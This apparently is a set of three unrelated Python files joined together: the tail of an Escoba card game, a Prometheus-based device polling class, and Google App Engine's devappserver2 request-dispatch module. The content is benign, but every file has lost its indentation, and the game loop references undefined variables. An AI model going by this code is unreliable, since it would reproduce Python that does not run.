plays.add(tuple(player.hand))
return plays
def apply_play(self,play, player):
# validate(play)
playable = self.valid_plays(player, self.table_cards)
scored = False
t_cards = self.table_cards
#p_cards = play.pop()
p_cards = play
if p_cards in playable:
if isinstance(p_cards,str):
card_values = [self.deck.card_store[p_cards].face]
else:
card_values = [self.deck.card_store[c].face for c in p_cards ]
# assign card owners
s = sum(card_values)
if ( s == 15):
scored = True
for card in p_cards:
self.set_card_owner(card, player.name)
if card in self.table_cards:
self.table_cards.discard(card)
else:
if isinstance(p_cards, str):
self.table_cards.update({p_cards})
else:
self.table_cards.update(p_cards)
for card in p_cards:
if card in player.hand:
player.hand.discard(card)
if not self.table_cards:
player.award_point() #escoba
print(f"{player.name} Escoba!")
self.print_score()
return scored
def apply_score(self):
p1_total = set()
p1_oros = set()
p1_sevens = set()
p2_total = set()
p2_sevens = set()
p2_oros = set()
for card_id, card in self.deck.cards().items():
if (card.owner == self.pl1.name):
p1_total.add(card_id)
if card.suit == 'O': p1_oros.add(card_id)
if card.face == 7: p1_sevens.add(card_id)
else:
p2_total.add(card_id)
if card.suit == 'O': p2_oros.add(card_id)
if card.face == 7: p2_sevens.add(card_id)
if card_id == '7O':
self.pl1.award_point() if card.owner == self.pl1.name else self.pl2.award_point()
if len(p1_total) > len(p2_total):
self.pl1.award_point()
elif len(p2_total) > len(p1_total):
self.pl2.award_point()
if len(p1_oros) > len(p2_oros):
self.pl1.award_point()
elif len(p2_oros) > len(p1_oros):
self.pl2.award_point()
if len(p1_sevens) > len(p2_sevens):
self.pl1.award_point()
elif len(p2_sevens) > len(p1_sevens):
self.pl2.award_point()
print(f'Points:\tPL1\tPL2\nOros:\t[{len(p1_oros)}]\t[{len(p2_oros)}]\nSevens:\t[{len(p1_sevens)}]\t[{len(p2_sevens)}]\nCards:\t[{len(p1_total)}]\t[{len(p2_total)}]')
def play_round(self, first_player, second_player):
p1_cards, p2_cards ,table_cards = self.deal_start()
first_player.new_hand(p1_cards)
second_player.new_hand(p2_cards)
self.table_cards = table_cards
last_scored = ''
cards_left = len(self.deck.order())
while len(self.deck.order()) > 0:
if len(first_player.hand) == 0 and len(second_player.hand) == 0:
p1_cards, p2_cards = self.deal_hand()
first_player.new_hand(p1_cards)
second_player.new_hand(p2_cards)
cards_left = len(self.deck.order())
# hand per player
while (len(first_player.hand) + len(second_player.hand) > 0):
if (len(first_player.hand)):
playable = self.valid_plays(first_player,self.table_cards)
play = first_player.get_play(playable)
if self.apply_play(play,first_player): last_scored = first_player.name
if (len(second_player.hand)):
playable = self.valid_plays(second_player,self.table_cards)
play = second_player.get_play(playable)
if self.apply_play(play,second_player): last_scored = second_player.name
while not result_available.wait(timeout=120):
print('waiting for user input')
print(result)
print(play)
# award last_player_to_score remaining cards
[self.set_card_owner(card_id, last_scored) for card_id, card in self.deck.cards().items() if card.owner == '']
self.apply_score()
def print_score(self):
print("Player 1 score: {}\nPlayer 2 score: {}".format(self.pl1.score, self.pl2.score))
if __name__ == "__main__":
p1 = Player('player_1')
p2 = Player('player_2')
deck = Deck(make_deck())
g = Game(p1,p2,deck)
rounds = 0
while (p1.score < 15 and p2.score < 15):
rounds += 1
g.reset_deck()
if (rounds % 2 == 1):
g.play_round(p1,p2)
else:
g.play_round(p2,p1)
print("Round {}:\n\tPlayer 1 score: {}\n\tPlayer 2 score: {}".format(rounds, p1.score, p2.score))
|
Device.py
|
import abc
from prometheus_client import Gauge
from threading import Thread
import time
import signal
class PromVar:
def __init__(self, name, description=""):
self.name = name
self.value = None
self.description = description
self.lastUpdate_ms = int(time.time() * 1000)
self.status = 0
self.error = ""
self.prom = Gauge(name, description)
def setValue(self, value):
self.value = value
self.prom.set(value)
self.status = 1
self.error = ""
self.lastUpdate_ms = int(time.time() * 1000)
def setStatus(self, status, error=""):
self.status = status
self.error = error
def getValue(self):
return self.value
def getVariableSummary(self):
summary = dict()
summary["name"] = self.name
summary["value"] = self.getValue()
summary["description"] = self.description
summary["lastUpdate_ms"] = self.lastUpdate_ms
summary["status"] = self.status
summary["error"] = self.error
return summary
class Device(abc.ABC):
def __init__(self, name):
self.name = name
#self.namespace_prefix = ""
self.poll_loop_ms = 2000
self.variables = dict()
self._keep_running = True
self._loop_thread = Thread(target=self._loop_handler, daemon=True)
def addVariable(self, name, description=""):
self.variables[name] = PromVar(name, description)
def getVariableValue(self, name):
if self.variables.get(name) is not None:
return self.variables[name].getValue()
else:
return None
def getAllVariablesSummary(self):
var_list = []
for key, value in self.variables.items():
var_list.append( value.getVariableSummary() )
return var_list
def setVariableValue(self, name, value):
if self.variables.get(name) is not None:
self.variables[name].setValue(value)
def setVariableStatus(self, name, status, error=""):
if self.variables.get(name) is not None:
self.variables[name].setStatus(status, error)
def hasVar(self, name):
return self.variables.get(name) != None
def _loop_handler(self):
print("Starting Loop cycle for device", self.name)
while self._keep_running:
self.loop()
time.sleep(self.poll_loop_ms / 1000)
def is_alive(self):
return self._loop_thread.is_alive()
def stop(self):
self._keep_running = False
self.cleanup()
@abc.abstractmethod
def loop(self):
pass
@abc.abstractmethod
def write(self, name, value):
"""
Parameters
----------
name : str
varibale name that has been requested
value : any
variable value that has to be written
"""
pass
@abc.abstractmethod
def cleanup(self):
pass
listOfDevices = []
def addDevice(device):
listOfDevices.append(device)
def StartDevicesLoop():
for dev in listOfDevices:
try:
dev._loop_thread.start()
print("Started loop for device - ",dev.name)
except:
print("Failed to start loop for device - ",dev.name)
def getDeviceWithVar(name):
device = None
for dev in listOfDevices:
if dev.hasVar(name):
device = dev
break
return device
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from concurrent import futures
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_server
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import health_check_service
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import vm_runtime_factory
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
_MAX_UPLOAD_MEGABYTES = 32
_MAX_UPLOAD_BYTES = _MAX_UPLOAD_MEGABYTES * 1024 * 1024
_MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES = 64 * 1024 * 1024
_REDIRECT_HTML = '''\
<HTML><HEAD><meta http-equiv="content-type" content="%(content-type)s">
<TITLE>%(status)d Moved</TITLE></HEAD>
<BODY><H1>%(status)d Moved</H1>
The document has moved'
<A HREF="%(correct-url)s">here</A>.
</BODY></HTML>'''
_TIMEOUT_HTML = '<HTML><BODY>503 - This request has timed out.</BODY></HTML>'
# Factor applied to the request timeouts to compensate for the
# long vmengines reloads. TODO eventually remove that once we have
# optimized the vm_engine reload.
_VMENGINE_SLOWDOWN_FACTOR = 2
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
# TODO: uncomment for GA.
# 'vm': vm_runtime_factory.VMRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
_MAX_REQUEST_WAIT_TIME = 10
def _get_wait_time(self):
"""Gets the wait time before timing out a request.
Returns:
The timeout value in seconds.
"""
if self.vm_enabled():
return self._MAX_REQUEST_WAIT_TIME * _VMENGINE_SLOWDOWN_FACTOR
return self._MAX_REQUEST_WAIT_TIME
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_server.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_server.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.server_port = self._balanced_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
if (self._java_config and
self._module_configuration.runtime.startswith('java')):
runtime_config.java_config.CopyFrom(self._java_config)
if self._vm_config:
runtime_config.vm_config.CopyFrom(self._vm_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=bool(file_changes))
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._version = module_configuration.major_version
self._app_name_external = module_configuration.application_external_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._java_config = java_config
self._cloud_sql_config = cloud_sql_config
self._vm_config = vm_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
if self.vm_enabled():
self._RUNTIME_INSTANCE_FACTORIES['vm'] = (
vm_runtime_factory.VMRuntimeInstanceFactory)
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
def vm_enabled(self):
# TODO: change when GA
return self._vm_config
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._name
@property
def version(self):
"""The version of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._version
@property
def app_name_external(self):
"""The external application name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._app_name_external
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def runtime(self):
"""Runtime property for this module."""
return self._module_configuration.runtime
@property
def effective_runtime(self):
"""Effective_runtime property for this module."""
return self._module_configuration.effective_runtime
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status, body=None):
if body:
start_response(
'%d %s' % (status, httplib.responses[status]),
[('Content-Type', 'text/html'),
('Content-Length', str(len(body)))])
return body
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.major_version,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
content_length = int(environ.get('CONTENT_LENGTH', '0'))
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'DELETE', 'TRACE') and
content_length != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
# Do not apply request limits to internal _ah handlers (known to break
# blob uploads).
# TODO: research if _ah handlers need limits.
if (not environ.get('REQUEST_URI', '/').startswith('/_ah/') and
content_length > _MAX_UPLOAD_BYTES):
# As allowed by the RFC, cherrypy closes the connection for 413 errors.
# Most clients do not handle this correctly and treat the page as
# unavailable if the connection is closed before the client can send
# all the data. To match the behavior of production, for large files
# < 64M read the data to prevent the client bug from being triggered.
if content_length <= _MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES:
environ['wsgi.input'].read(content_length)
status = '%d %s' % (httplib.REQUEST_ENTITY_TOO_LARGE,
httplib.responses[httplib.REQUEST_ENTITY_TOO_LARGE])
wrapped_start_response(status, [])
return ['Upload limited to %d megabytes.' % _MAX_UPLOAD_MEGABYTES]
with self._handler_lock:
handlers = self._handlers
try:
path_info = environ['PATH_INFO']
path_info_normal = self._normpath(path_info)
if path_info_normal != path_info:
# While a 301 Moved Permanently makes more sense for non-normal
# paths, prod issues a 302 so we do the same.
return self._redirect_302_path_info(path_info_normal,
environ,
wrapped_start_response)
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(path_info)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', path_info)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
return _THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
@staticmethod
def _quote_querystring(qs):
"""Quote a query string to protect against XSS."""
parsed_qs = urlparse.parse_qs(qs, keep_blank_values=True)
# urlparse.parse returns a dictionary with values as lists while
# urllib.urlencode does not handle those. Expand to a list of
# key values.
expanded_qs = []
for key, multivalue in parsed_qs.items():
for value in multivalue:
expanded_qs.append((key, value))
return urllib.urlencode(expanded_qs)
def _redirect_302_path_info(self, updated_path_info, environ, start_response):
"""Redirect to an updated path.
Respond to the current request with a 302 Found status with an updated path
but preserving the rest of the request.
Notes:
- WSGI does not make the fragment available so we are not able to preserve
it. Luckily prod does not preserve the fragment so it works out.
Args:
updated_path_info: the new HTTP path to redirect to.
environ: WSGI environ object.
start_response: WSGI start response callable.
Returns:
WSGI-compatible iterable object representing the body of the response.
"""
correct_url = urlparse.urlunsplit(
(environ['wsgi.url_scheme'],
environ['HTTP_HOST'],
urllib.quote(updated_path_info),
self._quote_querystring(environ['QUERY_STRING']),
None))
content_type = 'text/html; charset=utf-8'
output = _REDIRECT_HTML % {
'content-type': content_type,
'status': httplib.FOUND,
'correct-url': correct_url
}
